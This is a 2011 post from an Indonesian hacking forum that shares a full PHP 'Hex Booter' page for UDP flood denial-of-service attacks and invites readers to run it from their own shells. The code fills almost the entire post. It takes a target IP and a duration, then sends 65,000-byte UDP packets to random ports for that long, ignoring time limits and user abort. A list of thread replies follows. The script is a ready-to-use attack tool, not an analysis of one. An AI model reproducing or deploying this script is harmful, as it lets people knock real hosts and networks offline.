UDP FLOOD VERSI IBTeAM..
#1
Untuk ddos nih .. gunakan shell masing2 ja Tongue

PHP Code:
<html>
<
head>
Hex Booter
<?php
$ip 
$_SERVER['REMOTE_ADDR'];
?>
</head>
<body>
<center>
<font color="green">
<pre>


*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

    *** *** *** *** *** * "Indonesian Backtrack Team " * *** *** *** *** ***
 
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

Greetz To All Indonesian Backtrack Team 

 <input type="image" border="0" name="imageField" 
src="http://forum.indonesianbacktrack.or.id/images/daeva/logo.png" width="600" 
height="250"> 

<center><b>Your IP:</b> <font color="red"><?php echo $ip?></font> Don't Dos yourself<br><br></center>
</pre>
<STYLE>
input{
background-color: blue; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #666666;
}
button{
background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
}
body {
background-color: #000000;
}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
    
$packets 0;
    
ignore_user_abort(TRUE);
    
set_time_limit(0);
    
    
$exec_time $_GET['time'];
    
    
$time time();
    
//print "Started: ".time('d-m-y h:i:s')."<br>";
    
$max_time $time+$exec_time;

    
$host $_GET['host'];
    
    for(
$i=0;$i<65000;$i++){
            
$out .= 'X';
    }
    while(
1){
    
$packets++;
            if(
time() > $max_time){
                    break;
            }
            
$rand rand(1,65000);
            
$fp fsockopen('udp://'.$host$rand$errno$errstr5);
            if(
$fp){
                    
fwrite($fp$out);
                    
fclose($fp);
            }
    }
    echo 
"<br><b>UDP Flood</b><br>Completed with $packets (" round(($packets*65)/10242) . " MB) packets averaging "round($packets/$exec_time2) . " packets per second \n";
    echo 
'<br><br>
        <form action="'
.$surl.'" method=GET>
        <input type="hidden" name="act" value="phptools">
        IP: <br><input type=text name=host><br>
        Length (seconds): <br><input type=text name=time><br>
        <input type=submit value=Go></form>'
;
}else{ echo 
'<br><b>UDP Flood</b><br>
            <form action=? method=GET>
            <input type="hidden" name="act" value="phptools">
            IP: <br><input type=text name=host value=><br>
            Length (seconds): <br><input type=text name=time value=><br><br>
            <input type=submit value=Go></form>'
;
}
?>
</center>
</body>
</html> 
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only


Messages In This Thread
UDP FLOOD VERSI IBTeAM.. - by zee eichel - 08-30-2011, 08:20 PM
RE: UDP FLOOD VERSI IBTeAM.. - by lau13 - 08-30-2011, 08:25 PM
RE: UDP FLOOD VERSI IBTeAM.. - by iKONspirasi - 08-30-2011, 08:43 PM
RE: UDP FLOOD VERSI IBTeAM.. - by cassaprodigy - 08-31-2011, 02:09 PM
RE: UDP FLOOD VERSI IBTeAM.. - by THJC - 08-31-2011, 10:06 PM
RE: UDP FLOOD VERSI IBTeAM.. - by zee eichel - 08-31-2011, 10:20 PM
RE: UDP FLOOD VERSI IBTeAM.. - by iKONspirasi - 08-31-2011, 10:22 PM
RE: UDP FLOOD VERSI IBTeAM.. - by THJC - 08-31-2011, 10:36 PM
RE: UDP FLOOD VERSI IBTeAM.. - by zee eichel - 09-01-2011, 02:33 AM
RE: UDP FLOOD VERSI IBTeAM.. - by iKONspirasi - 09-03-2011, 11:33 AM
RE: UDP FLOOD VERSI IBTeAM.. - by zee eichel - 09-03-2011, 08:57 PM
RE: UDP FLOOD VERSI IBTeAM.. - by iKONspirasi - 09-04-2011, 03:55 AM
RE: UDP FLOOD VERSI IBTeAM.. - by iKONspirasi - 09-05-2011, 04:11 AM
RE: UDP FLOOD VERSI IBTeAM.. - by shadowsmaker - 09-09-2011, 06:27 PM
RE: UDP FLOOD VERSI IBTeAM.. - by ezzaez - 09-17-2011, 08:55 AM
RE: UDP FLOOD VERSI IBTeAM.. - by guitariznoize - 10-08-2011, 08:14 PM
RE: UDP FLOOD VERSI IBTeAM.. - by james0baster - 10-29-2011, 05:41 PM
RE: UDP FLOOD VERSI IBTeAM.. - by xsan-lahci - 07-15-2012, 04:26 AM
RE: UDP FLOOD VERSI IBTeAM.. - by xsan-lahci - 07-16-2012, 10:30 PM
RE: UDP FLOOD VERSI IBTeAM.. - by Al - Ayyubi - 08-07-2012, 03:49 PM
RE: UDP FLOOD VERSI IBTeAM.. - by Kresna - 02-14-2013, 12:42 PM
RE: UDP FLOOD VERSI IBTeAM.. - by [H2] - 02-14-2013, 02:30 PM
RE: UDP FLOOD VERSI IBTeAM.. - by arfha - 02-15-2013, 12:51 AM
RE: UDP FLOOD VERSI IBTeAM.. - by mywisdom - 02-15-2013, 10:11 AM
RE: UDP FLOOD VERSI IBTeAM.. - by drewcode - 02-15-2013, 07:11 PM
RE: UDP FLOOD VERSI IBTeAM.. - by arfha - 02-15-2013, 02:26 PM
RE: UDP FLOOD VERSI IBTeAM.. - by blu3creter - 05-23-2013, 08:30 PM




Users browsing this thread: 2 Guest(s)